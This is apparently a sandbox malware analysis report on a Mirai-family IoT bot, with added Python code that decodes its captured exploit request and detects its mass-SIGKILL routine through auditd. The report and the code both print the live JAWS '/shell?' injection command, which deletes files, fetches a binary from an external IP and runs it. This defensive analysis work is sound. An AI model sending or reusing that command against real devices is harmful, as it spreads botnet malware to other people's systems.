    Source: unknown | TCP traffic detected without corresponding DNS query: 99.214.255.211
    Source: unknown | TCP traffic detected without corresponding DNS query: 99.181.191.227
    Source: unknown | TCP traffic detected without corresponding DNS query: 209.195.25.100
    Source: unknown | TCP traffic detected without corresponding DNS query: 114.228.180.90
    Source: unknown | TCP traffic detected without corresponding DNS query: 111.71.47.153
    Source: unknown | TCP traffic detected without corresponding DNS query: 152.117.191.72
    Source: unknown | TCP traffic detected without corresponding DNS query: 223.214.7.227
    Source: unknown | TCP traffic detected without corresponding DNS query: 152.218.88.234
    Source: unknown | TCP traffic detected without corresponding DNS query: 150.251.189.209
    Source: unknown | TCP traffic detected without corresponding DNS query: 93.98.117.66
    Source: unknown | TCP traffic detected without corresponding DNS query: 196.152.17.96
    Source: unknown | TCP traffic detected without corresponding DNS query: 81.55.204.244
    Source: unknown | TCP traffic detected without corresponding DNS query: 54.157.98.241
    Source: unknown | TCP traffic detected without corresponding DNS query: 20.244.188.141
    Source: unknown | TCP traffic detected without corresponding DNS query: 1.162.166.198
    Source: unknown | TCP traffic detected without corresponding DNS query: 170.254.96.95
    Source: unknown | TCP traffic detected without corresponding DNS query: 137.129.244.17
    Source: unknown | TCP traffic detected without corresponding DNS query: 126.115.224.73
    Source: unknown | TCP traffic detected without corresponding DNS query: 138.42.77.248
    Source: unknown | TCP traffic detected without corresponding DNS query: 160.131.17.133
    Source: unknown | TCP traffic detected without corresponding DNS query: 189.163.109.36
    Source: unknown | TCP traffic detected without corresponding DNS query: 102.93.154.32
    Source: unknown | TCP traffic detected without corresponding DNS query: 207.145.115.10
    Source: unknown | TCP traffic detected without corresponding DNS query: 104.120.150.99
    Source: unknownTCP traffic detected without corresponding DNS query: 42.185.73.124
    Source: unknownTCP traffic detected without corresponding DNS query: 46.181.28.79
    Source: unknownTCP traffic detected without corresponding DNS query: 114.50.21.187
    Source: unknownTCP traffic detected without corresponding DNS query: 41.37.189.210
    Source: VAkpLB9NSD | String found in binary or memory: http://upx.sf.net
    Source: syslog.354.dr, syslog.300.dr, syslog.71.dr, syslog.196.dr, syslog.234.dr | String found in binary or memory: https://www.rsyslog.com
    Source: unknown | DNS traffic detected: queries for: daisy.ubuntu.com
    Source: global traffic | HTTP traffic detected (this identical request is recorded 53 times in the report; the headers are shown on separate lines here):
        GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1
        User-Agent: Hello, world
        Host: 127.0.0.1:80
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Connection: keep-alive
    Source: unknown | HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36462 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35688 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35690 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35692 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35694 version: TLS 1.2
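    The HTTP request above is the JAWS webserver "/shell?" command-injection stager that Mirai/Gafgyt scanners spray at every address they probe: the query string is a ';'-separated shell command list that the vulnerable device passes to a shell, which is why the same request is captured dozens of times with Host: 127.0.0.1:80 (the sample never resolves a name, it just iterates IPs). The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code. It reconstructs the captured request from the report's flattened line (headers split onto their own lines), decodes the query the way the target would, and pulls out the stager IP and path, the dropped file and the execution step. The decoding is generalised slightly beyond this one capture: it accepts %20 as well as '+' and recognises curl/tftp stagers in addition to wget; only IP-literal stager hosts are matched, which is what these bots use.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed raw request reproducing the one the sandbox captured (the report
# shows the headers run together on a single line).
SAMPLE_REQUEST = (
    "GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;"
    "chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1\r\n"
    "User-Agent: Hello, world\r\n"
    "Host: 127.0.0.1:80\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

# Verbs that only make sense as a download-and-execute chain on an IoT target.
DROPPER_VERBS = ("wget", "curl", "tftp", "ftpget", "chmod", "sh", "busybox")
STAGER_VERBS = ("wget", "curl", "tftp", "ftpget")
EXEC_VERBS = ("sh", "busybox")
# IP-literal host, optional port, then the path of the dropped binary.
URL_RE = re.compile(r"(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(/\S+)")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, request-target, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def analyse_shell_request(raw):
    """Return a verdict dict for a JAWS-style '/shell?<commands>' request.

    unquote_plus() decodes both '+' and %20 to spaces, as the target's CGI
    layer would, so the command list can be split on ';' afterwards.
    """
    method, target, headers = parse_request(raw)
    parts = urlsplit(target)
    if parts.path != "/shell" or not parts.query:
        return {"match": False}
    cmd_line = unquote_plus(parts.query)
    commands = [c.strip() for c in cmd_line.split(";") if c.strip()]
    verbs = [c.split()[0] for c in commands]
    stager = next((c for c in commands if c.split()[0] in STAGER_VERBS), None)
    url = URL_RE.search(stager) if stager else None
    executed = next((c for c in commands
                     if c.split()[0] in EXEC_VERBS or c.startswith("./")), None)
    return {
        "match": True,
        "method": method,
        "user_agent": headers.get("user-agent", ""),
        "commands": commands,
        "dropper_chain": any(v in DROPPER_VERBS for v in verbs),
        "stager_ip": url.group(1) if url else None,
        "stager_path": url.group(2) if url else None,
        "exec_cmd": executed,
    }


if __name__ == "__main__":
    for key, value in analyse_shell_request(SAMPLE_REQUEST).items():
        print(f"{key}: {value}")
```

    The stager_ip and stager_path fields are the indicators worth blocking or hunting for; the decoded command list is what an IDS signature on the raw "+"-encoded query would miss if the scanner switched to %20 encoding.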

    System Summary:

    Malicious sample detected (through community Yara rule)
    Source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY | Matched rule: Detects Mirai Botnet Malware | Author: Florian Roth
    Source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY | Matched rule: Detects Mirai Botnet Malware | Author: Florian Roth
    Source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY | Matched rule: Detects Mirai Botnet Malware | Author: Florian Roth
    Source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY | Matched rule: Detects Mirai Botnet Malware | Author: Florian Roth
    Source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY | Matched rule: Detects Mirai Botnet Malware | Author: Florian Roth
    Source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY | Matched rule: Detects Mirai Botnet Malware | Author: Florian Roth
    Sample tries to kill multiple processes (SIGKILL)
    Source: /tmp/VAkpLB9NSD (PID: 5275) | SIGKILL sent: pid: 936, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 936, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5275, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 491, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 658, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 720, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 721, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 759, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 761, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 772, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 774, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 777, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 785, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 793, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 1344, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 1886, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 2048, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5037, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5176, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5177, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5280, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5281, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5308, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5360, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5375, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5448, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5452, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5571, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5572, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5578, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5635, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5659, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5664, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5675, result: successful
    Source: /tmp/VAkpLB9NSD (PID: 5278) | SIGKILL sent: pid: 5680, result: successful
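    A single process sending SIGKILL to dozens of unrelated PIDs in a burst, including its own sibling instances (5275, 5280, 5281 above), is the process-killing routine typical of Mirai and Gafgyt families, which evicts competing bots and services so the device belongs to one operator. On a real host this is cheap to catch with auditd: audit the kill(2) syscall and alert when one process kills many distinct targets in a short window. The Python below is an added example, not part of the report or the sample. It parses constructed auditd SYSCALL records (modelled on the PIDs listed above, with the arch field set to i386 because the sample is a 32-bit Intel ELF) and flags any process that successfully SIGKILLs five or more distinct PIDs within 30 seconds. It assumes a rule of the form `-a always,exit -F arch=b32 -S kill -k sigkill` (the key name is a hypothetical choice), and that arguments appear in hex as auditd writes them.

```python
import re
from collections import defaultdict

# kill(2) syscall number keyed by the auditd "arch" field: x86_64 and i386.
KILL_SYSCALL_BY_ARCH = {"c000003e": 62, "40000003": 37}
SIGKILL = 9
TOKEN_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
TS_RE = re.compile(r"audit\((\d+\.\d+):\d+\)")

# Constructed auditd records (not taken from the report). a0 is the target PID
# and a1 the signal, both in hex: 3a8=936, 149b=5275, 1eb=491, 292=658,
# 2d0=720, 2d1=721. The last lines are benign noise the detector must ignore:
# a failed kill, a SIGTERM from systemd, a single kill from a shell, and a
# PROCTITLE record.
SAMPLE_AUDIT = """\
type=SYSCALL msg=audit(1642204001.101:2001): arch=40000003 syscall=37 success=yes exit=0 a0=3a8 a1=9 a2=0 a3=0 items=0 ppid=5274 pid=5278 auid=4294967295 uid=0 gid=0 euid=0 comm="VAkpLB9NSD" exe="/tmp/VAkpLB9NSD" key="sigkill"
type=SYSCALL msg=audit(1642204001.102:2002): arch=40000003 syscall=37 success=yes exit=0 a0=149b a1=9 a2=0 a3=0 items=0 ppid=5274 pid=5278 auid=4294967295 uid=0 gid=0 euid=0 comm="VAkpLB9NSD" exe="/tmp/VAkpLB9NSD" key="sigkill"
type=SYSCALL msg=audit(1642204001.103:2003): arch=40000003 syscall=37 success=yes exit=0 a0=1eb a1=9 a2=0 a3=0 items=0 ppid=5274 pid=5278 auid=4294967295 uid=0 gid=0 euid=0 comm="VAkpLB9NSD" exe="/tmp/VAkpLB9NSD" key="sigkill"
type=SYSCALL msg=audit(1642204001.104:2004): arch=40000003 syscall=37 success=yes exit=0 a0=292 a1=9 a2=0 a3=0 items=0 ppid=5274 pid=5278 auid=4294967295 uid=0 gid=0 euid=0 comm="VAkpLB9NSD" exe="/tmp/VAkpLB9NSD" key="sigkill"
type=SYSCALL msg=audit(1642204001.105:2005): arch=40000003 syscall=37 success=yes exit=0 a0=2d0 a1=9 a2=0 a3=0 items=0 ppid=5274 pid=5278 auid=4294967295 uid=0 gid=0 euid=0 comm="VAkpLB9NSD" exe="/tmp/VAkpLB9NSD" key="sigkill"
type=SYSCALL msg=audit(1642204001.106:2006): arch=40000003 syscall=37 success=yes exit=0 a0=2d1 a1=9 a2=0 a3=0 items=0 ppid=5274 pid=5278 auid=4294967295 uid=0 gid=0 euid=0 comm="VAkpLB9NSD" exe="/tmp/VAkpLB9NSD" key="sigkill"
type=SYSCALL msg=audit(1642204001.110:2007): arch=40000003 syscall=37 success=no exit=-1 a0=1 a1=9 a2=0 a3=0 items=0 ppid=5274 pid=5278 auid=4294967295 uid=0 gid=0 euid=0 comm="VAkpLB9NSD" exe="/tmp/VAkpLB9NSD" key="sigkill"
type=SYSCALL msg=audit(1642204002.500:2010): arch=c000003e syscall=62 success=yes exit=0 a0=1f40 a1=f a2=0 a3=0 items=0 ppid=0 pid=1 auid=4294967295 uid=0 gid=0 euid=0 comm="systemd" exe="/usr/lib/systemd/systemd" key="sigkill"
type=SYSCALL msg=audit(1642204003.000:2011): arch=c000003e syscall=62 success=yes exit=0 a0=320 a1=9 a2=0 a3=0 items=0 ppid=1150 pid=1200 auid=1000 uid=1000 gid=1000 euid=1000 comm="bash" exe="/usr/bin/bash" key="sigkill"
type=PROCTITLE msg=audit(1642204003.000:2011): proctitle=6B696C6C202D3920383030
"""


def parse_audit_record(line):
    """Turn one auditd line into a dict of fields plus a float 'ts'."""
    rec = dict(TOKEN_RE.findall(line))
    for key, value in rec.items():
        if value.startswith('"') and value.endswith('"'):
            rec[key] = value[1:-1]
    m = TS_RE.search(line)
    rec["ts"] = float(m.group(1)) if m else 0.0
    return rec


def sigkill_events(lines):
    """Yield (ts, killer_pid, comm, exe, target_pid) for successful SIGKILLs."""
    for line in lines:
        if not line.startswith("type=SYSCALL"):
            continue
        rec = parse_audit_record(line)
        if rec.get("success") != "yes":
            continue
        if int(rec.get("syscall", -1)) != KILL_SYSCALL_BY_ARCH.get(rec.get("arch")):
            continue
        if int(rec["a1"], 16) != SIGKILL:
            continue
        yield rec["ts"], int(rec["pid"]), rec.get("comm", ""), rec.get("exe", ""), int(rec["a0"], 16)


def find_kill_sweeps(lines, min_targets=5, window=30.0):
    """Flag processes that SIGKILL >= min_targets distinct PIDs within `window` seconds."""
    by_killer = defaultdict(list)
    for ts, pid, comm, exe, target in sigkill_events(lines):
        by_killer[(pid, comm, exe)].append((ts, target))
    alerts = []
    for (pid, comm, exe), events in by_killer.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            in_window = [t for ts, t in events[i:] if ts - start <= window]
            targets = sorted(set(in_window))
            if len(targets) >= min_targets:
                alerts.append({"pid": pid, "comm": comm, "exe": exe,
                               "first_ts": start, "targets": targets})
                break
    return alerts


if __name__ == "__main__":
    for alert in find_kill_sweeps(SAMPLE_AUDIT.splitlines()):
        print(f"{alert['exe']} (pid {alert['pid']}) SIGKILLed {len(alert['targets'])} PIDs: {alert['targets']}")
```

    Only successful kills count, so a bot that tries and fails against PID 1 (EPERM) does not inflate the tally, and an exe under /tmp or /dev/shm as the killer is a second signal worth weighting in a real rule.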